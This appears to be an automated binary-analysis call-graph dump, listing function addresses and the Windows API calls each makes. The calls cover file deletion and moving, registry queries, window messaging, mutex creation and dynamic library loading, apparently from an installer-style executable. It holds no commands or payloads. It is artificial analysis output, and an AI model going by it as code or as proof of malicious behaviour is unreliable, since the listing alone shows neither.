49915->49917 49920 491169 49917->49920 49925 4911cd 49918->49925 49926 4911f6 49918->49926 49921 446ff0 18 API calls 49919->49921 50088 490c84 8 API calls 49920->50088 49923 4911a2 49921->49923 50090 42c89c 49923->50090 49924 491175 50089 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49924->50089 49929 446ff0 18 API calls 49925->49929 49934 49122e 49926->49934 49935 491205 49926->49935 49931 4911da 49929->49931 50096 42c8c4 49931->50096 49941 49123d 49934->49941 49942 491266 49934->49942 49937 446ff0 18 API calls 49935->49937 49938 491212 49937->49938 50105 42c8f4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 49938->50105 49944 446ff0 18 API calls 49941->49944 49947 49129e 49942->49947 49948 491275 49942->49948 49943 49121d 50106 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49943->50106 49946 49124a 49944->49946 50107 42c924 49946->50107 49955 4912ea 49947->49955 49956 4912ad 49947->49956 49950 446ff0 18 API calls 49948->49950 49952 491282 49950->49952 50113 42c94c 49952->50113 49961 4912f9 49955->49961 49962 49133c 49955->49962 49958 446ff0 18 API calls 49956->49958 49960 4912bc 49958->49960 49963 446ff0 18 API calls 49960->49963 49965 446ff0 18 API calls 49961->49965 49969 49134b 49962->49969 49972 4913af 49962->49972 49964 4912cd 49963->49964 50119 42c4f0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 49964->50119 49967 49130c 49965->49967 49970 446ff0 18 API calls 49967->49970 49968 4912d9 50120 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49968->50120 50045 446ff0 49969->50045 49974 49131d 49970->49974 49978 4913ee 49972->49978 49979 4913be 49972->49979 50121 490e7c 12 API calls 49974->50121 49975 490fc1 50152 403420 49975->50152 49988 49142d 49978->49988 49989 4913fd 49978->49989 49982 446ff0 18 API calls 49979->49982 49981 49132b 50122 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49981->50122 49985 4913cb 49982->49985 49983 491366 49986 49136a 49983->49986 49987 49139f 49983->49987 50125 4528dc Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection DeleteFileA GetLastError 49985->50125 49992 446ff0 18 API calls 49986->49992 50124 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49987->50124 50000 49146c 49988->50000 50001 49143c 49988->50001 49993 446ff0 18 API calls 49989->49993 49995 491379 49992->49995 49996 49140a 49993->49996 49994 4913d8 50126 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49994->50126 50050 452c54 49995->50050 50127 452744 49996->50127 50009 49147b 50000->50009 50010 4914b4 50000->50010 50005 446ff0 18 API calls 50001->50005 50002 4913e9 50002->49975 50003 491389 50123 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50003->50123 50004 491417 50134 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50004->50134 50008 491449 50005->50008 50135 452de4 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 50008->50135 50012 446ff0 18 API calls 50009->50012 50016 4914fc 50010->50016 50017 4914c3 50010->50017 50014 49148a 50012->50014 50013 491456 50136 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50013->50136 50018 446ff0 18 API calls 50014->50018 50023 49150f 50016->50023 50028 4915c5 50016->50028 50019 446ff0 18 API calls 50017->50019 50020 49149b 50018->50020 50021 4914d2 50019->50021 50137 447270 50020->50137 50022 446ff0 18 API calls 50021->50022 50024 4914e3 50022->50024 50026 446ff0 18 API calls 50023->50026 50032 447270 5 API calls 50024->50032 50027 49153c 50026->50027 50029 446ff0 18 API calls 50027->50029 50028->49975 50146 446f94 18 API calls 50028->50146 50030 491553 50029->50030 50143 407dcc 7 API calls 50030->50143 50032->49975 50033 4915de 50147 42e8c0 FormatMessageA 50033->50147 50038 491575 50039 446ff0 18 API calls 50038->50039 50040 491589 50039->50040 50144 4084f8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50040->50144 50042 491594 50145 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50042->50145 50044 4915a0 50046 446ff8 50045->50046 50160 436070 50046->50160 50048 447017 50049 42c600 7 API calls 50048->50049 50049->49983 50210 4526f8 50050->50210 50052 452c71 50052->50003 50053 452c6d 50053->50052 50054 452c95 MoveFileA GetLastError 50053->50054 50216 452734 50054->50216 50057->49975 50059 406baf 50058->50059 50060 406bd1 50059->50060 50061 406bc8 50059->50061 50219 403778 50060->50219 50062 403400 4 API calls 50061->50062 50063 406bcf 50062->50063 50065 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50063->50065 50065->49975 50066->49880 50067->49975 50068->49887 50069->49975 50070->49890 50071->49975 50226 403738 50072->50226 50075->49975 50077 403738 50076->50077 50078 42c81f GetFullPathNameA 50077->50078 50079 42c842 50078->50079 50080 42c82b 50078->50080 50082 403494 4 API calls 50079->50082 50080->50079 50081 42c833 50080->50081 50083 4034e0 4 API calls 50081->50083 50084 42c840 50082->50084 50083->50084 50085 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50084->50085 50085->49975 50086->49913 50087->49975 50088->49924 50089->49975 50228 42c794 50090->50228 50093 403778 4 API calls 50094 42c8bd 50093->50094 50095 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50094->50095 50095->49975 50243 42c66c 50096->50243 50099 42c8e1 50102 403778 4 API calls 50099->50102 50100 42c8d8 50101 403400 4 API calls 50100->50101 50103 42c8df 50101->50103 50102->50103 50104 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50103->50104 50104->49975 50105->49943 50106->49975 50108 42c794 IsDBCSLeadByte 50107->50108 50109 42c934 50108->50109 50110 403778 4 API calls 50109->50110 50111 42c946 50110->50111 50112 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50111->50112 50112->49975 50114 42c794 IsDBCSLeadByte 50113->50114 50115 42c95c 50114->50115 50116 403778 4 API calls 50115->50116 50117 42c96d 50116->50117 50118 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50117->50118 50118->49975 50119->49968 50120->49975 50121->49981 50122->49975 50123->49975 50124->49975 50125->49994 50126->50002 50128 4526f8 2 API calls 50127->50128 50129 45275a 50128->50129 50130 45275e 50129->50130 50131 45277c CreateDirectoryA GetLastError 50129->50131 50130->50004 50132 452734 Wow64RevertWow64FsRedirection 50131->50132 50133 4527a2 50132->50133 50133->50004 50134->49975 50135->50013 50136->49975 50138 447278 50137->50138 50246 4363d8 VariantClear 50138->50246 50140 44729b 50142 4472b2 50140->50142 50247 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50140->50247 50142->49975 50143->50038 50144->50042 50145->50044 50146->50033 50148 42e8e6 50147->50148 50149 4034e0 4 API calls 50148->50149 50150 42e903 50149->50150 50151 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50150->50151 50151->49975 50153 403426 50152->50153 50154 40344b 50153->50154 50155 402660 4 API calls 50153->50155 50156 403400 50154->50156 50155->50153 50157 403406 50156->50157 50158 40341f 50156->50158 50157->50158 50159 402660 4 API calls 50157->50159 50159->50158 50161 43607c 50160->50161 50163 43609e 50160->50163 50161->50163 50180 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50161->50180 50162 436121 50189 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50162->50189 50163->50162 50165 4360f1 50163->50165 50166 4360e5 50163->50166 50167 436115 50163->50167 50168 436109 50163->50168 50173 4360fd 50163->50173 50172 403510 4 API calls 50165->50172 50181 403510 50166->50181 50188 4040e8 18 API calls 50167->50188 50184 403494 50168->50184 50170 436132 50170->50048 50177 4360fa 50172->50177 50173->50048 50177->50048 50179 43611e 50179->50048 50180->50163 50190 4034e0 50181->50190 50185 403498 50184->50185 50186 4034ba 50185->50186 50205 402660 50185->50205 50186->50048 50188->50179 50189->50170 50195 4034bc 50190->50195 50192 4034f0 50193 403400 4 API calls 50192->50193 50194 403508 50193->50194 50194->50048 50196 4034c0 50195->50196 50197 4034dc 50195->50197 50200 402648 50196->50200 50197->50192 50199 4034c9 50199->50192 50201 40264c 50200->50201 50202 402656 50200->50202 50201->50202 50204 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50201->50204 50202->50199 50202->50202 50204->50202 50206 402664 50205->50206 50207 40266e 50205->50207 50206->50207 50209 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50206->50209 50207->50186 50207->50207 50209->50207 50211 452706 50210->50211 50212 452702 50210->50212 50213 45270f Wow64DisableWow64FsRedirection 50211->50213 50214 452728 SetLastError 50211->50214 50212->50053 50215 452723 50213->50215 50214->50215 50215->50053 50217 452743 50216->50217 50218 452739 Wow64RevertWow64FsRedirection 50216->50218 50217->50003 50218->50217 50220 4037aa 50219->50220 50221 40377d 50219->50221 50222 403400 4 API calls 50220->50222 50221->50220 50223 403791 50221->50223 50225 4037a0 50222->50225 50224 4034e0 4 API calls 50223->50224 50224->50225 50225->50063 50227 40373c SetCurrentDirectoryA 50226->50227 50227->49899 50233 42c674 50228->50233 50230 42c7f3 50230->50093 50232 42c7a9 50232->50230 50240 42c43c IsDBCSLeadByte 50232->50240 50236 42c685 50233->50236 50234 42c6e9 50237 42c6e4 50234->50237 50242 42c43c IsDBCSLeadByte 50234->50242 50236->50234 50238 42c6a3 50236->50238 50237->50232 50238->50237 50241 42c43c IsDBCSLeadByte 50238->50241 50240->50232 50241->50238 50242->50237 50244 42c674 IsDBCSLeadByte 50243->50244 50245 42c673 50244->50245 50245->50099 50245->50100 50246->50140 50247->50142 50248 480002 50249 48000b 50248->50249 50251 480036 50248->50251 50250 480028 50249->50250 50249->50251 50662 4766e4 188 API calls 50250->50662 50252 480075 50251->50252 50664 47eaec LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50251->50664 50253 480099 50252->50253 50256 48008c 50252->50256 50257 48008e 50252->50257 50261 4800d5 50253->50261 50262 4800b7 50253->50262 50266 47eb30 42 API calls 50256->50266 50666 47ebc4 42 API calls 50257->50666 50258 48002d 50258->50251 50663 408bd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50258->50663 50259 480068 50665 47eb54 42 API calls 50259->50665 50669 47e984 24 API calls 50261->50669 50267 4800cc 50262->50267 50667 47eb54 42 API calls 50262->50667 50266->50253 50668 47e984 24 API calls 50267->50668 50269 4800d3 50271 4800eb 50269->50271 50272 4800e5 50269->50272 50273 4800e9 50271->50273 50274 47eb30 42 API calls 50271->50274 50272->50273 50374 47eb30 50272->50374 50379 47bf1c 50273->50379 50274->50273 50738 47e618 42 API calls 50374->50738 50376 47eb4b 50739 408bd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50376->50739 50740 42d890 GetWindowsDirectoryA 50379->50740 50381 47bf3a 50382 403450 4 API calls 50381->50382 50383 47bf47 50382->50383 50742 42d8bc GetSystemDirectoryA 50383->50742 50385 47bf4f 50386 403450 4 API calls 50385->50386 50387 47bf5c 50386->50387 50744 42d8e8 50387->50744 50389 47bf64 50390 403450 4 API calls 50389->50390 50391 47bf71 50390->50391 50392 47bf96 50391->50392 50393 47bf7a 50391->50393 50395 403400 4 API calls 50392->50395 50800 42d200 50393->50800 50397 47bf94 50395->50397 50399 47bfdb 50397->50399 50401 42c8c4 5 API calls 50397->50401 50398 403450 4 API calls 50398->50397 50748 47bda4 50399->50748 50403 47bfb6 50401->50403 50404 403450 4 API calls 50403->50404 50406 47bfc3 50404->50406 50405 403450 4 API calls 50408 47bff7 50405->50408 50406->50399 50409 403450 4 API calls 50406->50409 50407 47c015 50411 47bda4 8 API calls 50407->50411 50408->50407 50410 4035c0 4 API calls 50408->50410 50409->50399 50410->50407 50412 47c024 50411->50412 50413 403450 4 API calls 50412->50413 50414 47c031 50413->50414 50415 47c059 50414->50415 50416 42c3f4 5 API calls 50414->50416 50417 47c0c0 50415->50417 50421 47bda4 8 API calls 50415->50421 50418 47c047 50416->50418 50419 47c0ea 50417->50419 50420 47c0c9 50417->50420 50422 4035c0 4 API calls 50418->50422 50759 42c3f4 50419->50759 50423 42c3f4 5 API calls 50420->50423 50424 47c071 50421->50424 50422->50415 50426 47c0d6 50423->50426 50427 403450 4 API calls 50424->50427 50429 4035c0 4 API calls 50426->50429 50430 47c07e 50427->50430 50428 47c0f7 50432 47c0e8 50429->50432 50433 47c091 50430->50433 50808 453318 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50430->50808 50791 47be88 50432->50791 50435 47bda4 8 API calls 50433->50435 50437 47c0a0 50435->50437 50662->50258 50664->50259 50665->50252 50666->50253 50667->50267 50668->50269 50669->50269 50738->50376 50741 42d8b1 50740->50741 50741->50381 50743 42d8dd 50742->50743 50743->50385 50745 403400 4 API calls 50744->50745 50746 42d8f8 GetModuleHandleA GetProcAddress 50745->50746 50747 42d911 50746->50747 50747->50389 50810 42de14 50748->50810 50750 47bdca 50751 47bdf0 50750->50751 50752 47bdce 50750->50752 50753 403400 4 API calls 50751->50753 50813 42dd44 50752->50813 50755 47bdf7 50753->50755 50755->50405 50757 47bde5 RegCloseKey 50757->50755 50758 403400 4 API calls 50758->50757 50760 42c421 50759->50760 50761 42c3fe 50759->50761 50763 403494 4 API calls 50760->50763 50847 42c974 CharPrevA 50761->50847 50764 42c42a 50763->50764 50764->50428 50765 42c405 50765->50760 50766 42c410 50765->50766 50801 4038a4 4 API calls 50800->50801 50804 42d213 50801->50804 50802 42d22a GetEnvironmentVariableA 50803 42d236 50802->50803 50802->50804 50805 403400 4 API calls 50803->50805 50804->50802 50807 42d23d 50804->50807 50848 42dbc8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50804->50848 50805->50807 50807->50398 50808->50433 50811 42de25 RegOpenKeyExA 50810->50811 50812 42de1f 50810->50812 50811->50750 50812->50811 50816 42dbf8 50813->50816 50817 42dc1e RegQueryValueExA 50816->50817 50823 42dc41 50817->50823 50832 42dc63 50817->50832 50818 403400 4 API calls 50820 42dd2f 50818->50820 50819 42dc5b 50821 403400 4 API calls 50819->50821 50820->50757 50820->50758 50821->50832 50822 4034e0 4 API calls 50822->50823 50823->50819 50823->50822 50823->50832 50833 403744 50823->50833 50825 42dc98 RegQueryValueExA 50825->50817 50826 42dcb4 50825->50826 50826->50832 50837 4038a4 50826->50837 50829 42dd08 50830 403450 4 API calls 50829->50830 50830->50832 50831 403744 4 API calls 50831->50829 50832->50818 50834 40374a 50833->50834 50836 40375b 50833->50836 50835 4034bc 4 API calls 50834->50835 50834->50836 50835->50836 50836->50825 50838 4038b1 50837->50838 50845 4038e1 50837->50845 50839 4038da 50838->50839 50841 4038bd 50838->50841 50842 4034bc 4 API calls 50839->50842 50840 403400 4 API calls 50843 4038cb 50840->50843 50846 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50841->50846 50842->50845 50843->50829 50843->50831 50845->50840 50846->50843 50847->50765 50848->50804 52913 491d44 52914 491d78 52913->52914 52915 491d7a 52914->52915 52916 491d8e 52914->52916 53049 446f94 18 API calls 52915->53049 52919 491dca 52916->52919 52920 491d9d 52916->52920 52918 491d83 Sleep 52976 491dc5 52918->52976 52925 491dd9 52919->52925 52926 491e06 52919->52926 52922 446ff0 18 API calls 52920->52922 52921 403420 4 API calls 52923 492238 52921->52923 52924 491dac 52922->52924 52928 491db4 FindWindowA 52924->52928 52927 446ff0 18 API calls 52925->52927 52931 491e5c 52926->52931 52932 491e15 52926->52932 52929 491de6 52927->52929 52930 447270 5 API calls 52928->52930 52933 491dee FindWindowA 52929->52933 52930->52976 52937 491eb8 52931->52937 52938 491e6b 52931->52938 53050 446f94 18 API calls 52932->53050 52935 447270 5 API calls 52933->52935 52991 491e01 52935->52991 52936 491e21 53051 446f94 18 API calls 52936->53051 52944 491f14 52937->52944 52945 491ec7 52937->52945 53054 446f94 18 API calls 52938->53054 52941 491e2e 53052 446f94 18 API calls 52941->53052 52942 491e77 53055 446f94 18 API calls 52942->53055 52955 491f4e 52944->52955 52956 491f23 52944->52956 53059 446f94 18 API calls 52945->53059 52947 491e3b 53053 446f94 18 API calls 52947->53053 52950 491e84 53056 446f94 18 API calls 52950->53056 52951 491e46 SendMessageA 52954 447270 5 API calls 52951->52954 52952 491ed3 53060 446f94 18 API calls 52952->53060 52954->52991 52967 491f5d 52955->52967 52972 491f9c 52955->52972 52959 446ff0 18 API calls 52956->52959 52958 491e91 53057 446f94 18 API calls 52958->53057 52962 491f30 52959->52962 52960 491ee0 53061 446f94 18 API calls 52960->53061 52968 491f38 RegisterClipboardFormatA 52962->52968 52964 491e9c PostMessageA 53058 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52964->53058 52966 491eed 53062 446f94 18 API calls 52966->53062 53064 446f94 18 API calls 52967->53064 52971 447270 5 API calls 52968->52971 52971->52976 52977 491fab 52972->52977 52978 491ff0 52972->52978 52973 491ef8 SendNotifyMessageA 53063 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52973->53063 52974 491f69 53065 446f94 18 API calls 52974->53065 52976->52921 53067 446f94 18 API calls 52977->53067 52985 491fff 52978->52985 52986 492044 52978->52986 52980 491f76 53066 446f94 18 API calls 52980->53066 52983 491fb7 53068 446f94 18 API calls 52983->53068 52984 491f81 SendMessageA 52988 447270 5 API calls 52984->52988 53071 446f94 18 API calls 52985->53071 52994 492053 52986->52994 52995 4920a6 52986->52995 52988->52991 52990 491fc4 53069 446f94 18 API calls 52990->53069 52991->52976 52992 49200b 53072 446f94 18 API calls 52992->53072 52999 446ff0 18 API calls 52994->52999 53003 49212d 52995->53003 53004 4920b5 52995->53004 52997 491fcf PostMessageA 53070 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52997->53070 53001 492060 52999->53001 53000 492018 53073 446f94 18 API calls 53000->53073 53005 42e38c 2 API calls 53001->53005 53014 49213c 53003->53014 53015 492162 53003->53015 53007 446ff0 18 API calls 53004->53007 53008 49206d 53005->53008 53006 492023 SendNotifyMessageA 53074 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53006->53074 53010 4920c4 53007->53010 53011 492083 GetLastError 53008->53011 53012 492073 53008->53012 53075 446f94 18 API calls 53010->53075 53016 447270 5 API calls 53011->53016 53013 447270 5 API calls 53012->53013 53017 492081 53013->53017 53080 446f94 18 API calls 53014->53080 53022 492171 53015->53022 53023 492194 53015->53023 53016->53017 53021 447270 5 API calls 53017->53021 53020 492146 FreeLibrary 53081 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53020->53081 53021->52976 53026 446ff0 18 API calls 53022->53026 53032 4921a3 53023->53032 53038 4921d7 53023->53038 53024 4920d7 GetProcAddress 53027 49211d 53024->53027 53028 4920e3 53024->53028 53029 49217d 53026->53029 53079 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53027->53079 53076 446f94 18 API calls 53028->53076 53034 492185 CreateMutexA 53029->53034 53082 48c174 18 API calls 53032->53082 53033 4920ef 53077 446f94 18 API calls 53033->53077 53034->52976 53037 4920fc 53041 447270 5 API calls 53037->53041 53038->52976 53084 48c174 18 API calls 53038->53084 53040 4921af 53043 4921c0 OemToCharBuffA 53040->53043 53042 49210d 53041->53042 53078 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53042->53078 53083 48c18c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53043->53083 53046 4921f2 53047 492203 CharToOemBuffA 53046->53047 53085 48c18c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53047->53085 53049->52918 53050->52936 53051->52941 53052->52947 53053->52951 53054->52942 53055->52950 53056->52958 53057->52964 53058->52991 53059->52952 53060->52960 53061->52966 53062->52973 53063->52976 53064->52974 53065->52980 53066->52984 53067->52983 53068->52990 53069->52997 53070->52991 53071->52992 53072->53000 53073->53006 53074->52976 53075->53024 53076->53033 53077->53037 53078->52991 53079->52991 53080->53020 53081->52976 53082->53040 53083->52976 53084->53046 53085->52976 53086 41ee4c 53087 41ee91 53086->53087 53088 41ee5b IsWindowVisible 53086->53088 53088->53087 53089 41ee65 IsWindowEnabled 53088->53089 53089->53087 53090 41ee6f 53089->53090 53091 402648 4 API calls 53090->53091 53092 41ee79 EnableWindow 53091->53092 53092->53087 53617 47ff68 53622 450fd8 53617->53622 53619 47ff7c 53632 47f054 53619->53632 53621 47ffa0 53623 450fe5 53622->53623 53625 451039 53623->53625 53641 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53623->53641 53638 450e5c 53625->53638 53629 451061 53630 4510a4 53629->53630 53643 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53629->53643 53630->53619 53648 40b5b0 53632->53648 53634 47f0c1 53634->53621 53636 47f076 53636->53634 53652 4069cc 53636->53652 53655 476428 53636->53655 53644 450e08 53638->53644 53641->53625 53642 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53642->53629 53643->53630 53645 450e2b 53644->53645 53646 450e1a 53644->53646 53645->53629 53645->53642 53647 450e1f InterlockedExchange 53646->53647 53647->53645 53649 40b5bb 53648->53649 53650 40b5db 53649->53650 53671 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53649->53671 53650->53636 53653 402648 4 API calls 53652->53653 53654 4069d7 53653->53654 53654->53636 53668 476459 53655->53668 53669 4764a2 53655->53669 53656 4764ed 53672 451268 53656->53672 53657 451268 21 API calls 53657->53668 53659 476504 53661 403420 4 API calls 53659->53661 53660 4038a4 4 API calls 53660->53668 53663 47651e 53661->53663 53662 4038a4 4 API calls 53662->53669 53663->53636 53664 403744 4 API calls 53664->53668 53665 403450 4 API calls 53665->53668 53666 403744 4 API calls 53666->53669 53667 403450 4 API calls 53667->53669 53668->53657 53668->53660 53668->53664 53668->53665 53668->53669 53669->53656 53669->53662 53669->53666 53669->53667 53670 451268 21 API calls 53669->53670 53670->53669 53671->53650 53673 451283 53672->53673 53674 451278 53672->53674 53678 45120c 21 API calls 53673->53678 53674->53659 53676 45128e 53676->53674 53679 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53676->53679 53678->53676 53679->53674 53093 41fb50 53094 41fb59 53093->53094 53097 41fdf4 53094->53097 53096 41fb66 53098 41fee6 53097->53098 53099 41fe0b 53097->53099 53098->53096 53099->53098 53118 41f9b4 GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53099->53118 53101 41fe41 53102 41fe45 53101->53102 53103 41fe6b 53101->53103 53119 41fb94 53102->53119 53128 41f9b4 GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53103->53128 53106 41fe79 53109 41fea3 53106->53109 53110 41fe7d 53106->53110 53108 41fb94 10 API calls 53117 41fe69 53108->53117 53112 41fb94 10 API calls 53109->53112 53111 41fb94 10 API calls 53110->53111 53113 41fe8f 53111->53113 53114 41feb5 53112->53114 53115 41fb94 10 API calls 53113->53115 53116 41fb94 10 API calls 53114->53116 53115->53117 53116->53117 53117->53096 53118->53101 53120 41fbaf 53119->53120 53121 41f934 4 API calls 53120->53121 53122 41fbc5 53120->53122 53121->53122 53129 41f934 53122->53129 53124 41fc0d 53125 41fc30 SetScrollInfo 53124->53125 53137 41fa94 53125->53137 53128->53106 53148 4181d8 53129->53148 53131 41f951 GetWindowLongA 53132 41f98e 53131->53132 53133 41f96e 53131->53133 53151 41f8c0 GetWindowLongA GetSystemMetrics GetSystemMetrics 53132->53151 53150 41f8c0 GetWindowLongA GetSystemMetrics GetSystemMetrics 53133->53150 53136 41f97a 53136->53124 53138 41faa2 53137->53138 53139 41faaa 53137->53139 53138->53108 53140 41fae9 53139->53140 53141 41fad9 53139->53141 53147 41fae7 53139->53147 53153 417e40 IsWindowVisible ScrollWindow SetWindowPos 53140->53153 53152 417e40 IsWindowVisible ScrollWindow SetWindowPos 53141->53152 53142 41fb29 GetScrollPos 53142->53138 53145 41fb34 53142->53145 53146 41fb43 SetScrollPos 53145->53146 53146->53138 53147->53142 53149 4181e2 53148->53149 53149->53131 53150->53136 53151->53136 53152->53147 53153->53147 53154 420590 53155 4205a3 53154->53155 53175 415b28 53155->53175 53157 4206ea 53158 420701 53157->53158 53182 4146cc KiUserCallbackDispatcher 53157->53182 53159 420718 53158->53159 53183 414710 KiUserCallbackDispatcher 53158->53183 53165 42073a 53159->53165 53184 420058 12 API calls 53159->53184 53160 4205de 53160->53157 53161 420649 53160->53161 53168 42063a MulDiv 53160->53168 53180 420840 20 API calls 53161->53180 53166 420662 53166->53157 53181 420058 12 API calls 53166->53181 53179 41a2fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 53168->53179 53171 42067f 53172 42069b MulDiv 53171->53172 53173 4206be 53171->53173 53172->53173 53173->53157 53174 4206c7 MulDiv 53173->53174 53174->53157 53176 415b3a 53175->53176 53185 414468 53176->53185 53178 415b52 53178->53160 53179->53161 53180->53166 53181->53171 53182->53158 53183->53159 53184->53165 53186 414482 53185->53186 53189 410640 53186->53189 53188 414498 53188->53178 53192 40de8c 53189->53192 53191 410646 53191->53188 53193 40deee 53192->53193 53194 40de9f 53192->53194 53199 40defc 53193->53199 53197 40defc 19 API calls 53194->53197 53198 40dec9 53197->53198 53198->53191 53200 40df0c 53199->53200 53202 40df22 53200->53202 53211 40e284 53200->53211 53227 40d7c8 53200->53227 53230 40e134 53202->53230 53205 40d7c8 5 API calls 53206 40df2a 53205->53206 53206->53205 53207 40df96 53206->53207 53233 40dd48 53206->53233 53209 40e134 5 API calls 53207->53209 53210 40def8 53209->53210 53210->53191 53247 40eb54 53211->53247 53213 403778 4 API calls 53214 40e2bf 53213->53214 53214->53213 53215 40e375 53214->53215 53309 40d95c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53214->53309 53310 40e268 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53214->53310 53216 40e390 53215->53216 53217 40e39f 53215->53217 53256 40e5a8 53216->53256 53306 40bc0c 53217->53306 53223 40e39d 53224 403400 4 API calls 53223->53224 53225 40e444 53224->53225 53225->53200 53228 40ebf0 5 API calls 53227->53228 53229 40d7d2 53228->53229 53229->53200 53343 40d6a4 53230->53343 53352 40e13c 53233->53352 53236 40eb54 5 API calls 53237 40dd86 53236->53237 53238 40eb54 5 API calls 53237->53238 53239 40dd91 53238->53239 53240 40dda3 53239->53240 53241 40ddac 53239->53241 53246 40dda9 53239->53246 53362 40dcb0 19 API calls 53240->53362 53359 40dbc0 53241->53359 53244 403420 4 API calls 53245 40de77 53244->53245 53245->53206 53246->53244 53312 40d968 53247->53312 53250 4034e0 4 API calls 53251 40eb77 53250->53251 53252 403744 4 API calls 53251->53252 53253 40eb7e 53252->53253 53254 40d968 5 API calls 53253->53254 53255 40eb8c 53254->53255 53255->53214 53257 40e5d4 53256->53257 53258 40e5de 53256->53258 53317 40d628 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53257->53317 53260 40e620 53258->53260 53261 40e6c1 53258->53261 53262 40e651 53258->53262 53263 40e6a3 53258->53263 53264 40e6f9 53258->53264 53265 40e67d 53258->53265 53266 40e6de 53258->53266 53267 40e75e 53258->53267 53299 40e644 53258->53299 53318 40d94c 53260->53318 53328 40eb90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53261->53328 53262->53299 53324 40da00 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53262->53324 53327 40dfcc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53263->53327 53268 40d94c 5 API calls 53264->53268 53325 40e00c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53265->53325 53330 40ea78 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53266->53330 53274 40d94c 5 API calls 53267->53274 53277 40e701 53268->53277 53270 403400 4 API calls 53278 40e7d3 53270->53278 53281 40e766 53274->53281 53285 40e70b 53277->53285 53293 40e705 53277->53293 53278->53223 53279 40e6cc 53329 409f20 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53279->53329 53280 40e688 53326 40d658 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53280->53326 53288 40e783 53281->53288 53289 40e76a 53281->53289 53283 40e649 53323 40e0c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53283->53323 53284 40e62c 53321 40e00c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53284->53321 53331 40ebf0 53285->53331 53337 40e00c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53288->53337 53296 40ebf0 5 API calls 53289->53296 53294 40e709 53293->53294 53298 40ebf0 5 API calls 53293->53298 53294->53299 53335 40e00c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53294->53335 53296->53299 53297 40e637 53322 40e454 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53297->53322 53302 40e72c 53298->53302 53299->53270 53334 40da88 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53302->53334 53303 40e74e 53336 40e4bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53303->53336 53338 40bbb8 53306->53338 53309->53214 53310->53214 53311 40d95c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53311->53223 53315 40d973 53312->53315 53313 40d9ad 53313->53250 53315->53313 53316 40d9b4 